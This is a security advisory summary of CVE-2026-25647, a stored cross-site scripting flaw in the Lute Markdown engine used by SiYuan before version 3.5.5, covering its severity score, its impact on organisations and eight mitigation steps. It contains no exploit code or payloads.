CVE-2026-25647 identifies a stored Cross-Site Scripting (XSS) vulnerability in the Lute Markdown engine, which is integrated into the SiYuan note-taking application. Lute versions 1.7.6 and earlier, as used in SiYuan versions prior to 3.5.5, improperly neutralize input during web page generation, allowing malicious JavaScript code to be embedded within Markdown notes. When a user views the rendered note, the injected script executes within their browser session, potentially compromising session confidentiality and integrity. This vulnerability falls under CWE-79, indicating improper input sanitization. Exploitation requires an attacker to have at least limited privileges to create or edit notes and relies on user interaction to trigger the malicious payload. The CVSS 3.1 base score of 4.6 reflects network attack vector, low attack complexity, low privileges required, and user interaction necessary, with limited confidentiality and integrity impact but no availability impact. No public exploits are currently known, but the vulnerability poses a risk in collaborative environments where untrusted users can contribute content. The lack of a patch link suggests that users must upgrade to SiYuan 3.5.5 or later, where the vulnerability is presumably fixed. Organizations using SiYuan for note-taking and knowledge management should assess their exposure and remediate accordingly.

For European organizations, this vulnerability can lead to session hijacking, theft of sensitive information, or unauthorized actions performed in the context of a victim's session if exploited. The impact is particularly relevant for organizations that use SiYuan as a collaborative knowledge management or note-taking tool, especially in sectors like education, research, and enterprise knowledge bases. Attackers could leverage this vulnerability to escalate privileges, exfiltrate confidential data, or spread malware within an organization. While the vulnerability does not affect system availability, the compromise of confidentiality and integrity can lead to reputational damage, regulatory non-compliance (e.g., GDPR), and operational disruptions. The requirement for user interaction and limited privileges reduces the risk somewhat but does not eliminate it, especially in environments with many users and frequent content sharing. Organizations with remote or hybrid workforces relying on such tools are at increased risk due to diverse user access patterns.

1. Upgrade SiYuan to version 3.5.5 or later immediately to ensure the vulnerability is patched. 2. Implement strict input validation and sanitization on all Markdown content inputs to prevent script injection. 3. Deploy Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts in the application context. 4. Educate users about the risks of clicking on untrusted or unexpected links and rendered content within SiYuan notes. 5. Monitor logs for unusual activity related to note creation or modification, especially from users with limited privileges. 6. Consider restricting note creation or editing permissions to trusted users only, reducing the attack surface. 7. Regularly audit and review third-party components like Lute for vulnerabilities and apply updates promptly. 8. Employ web application firewalls (WAFs) with rules to detect and block XSS payloads targeting SiYuan endpoints.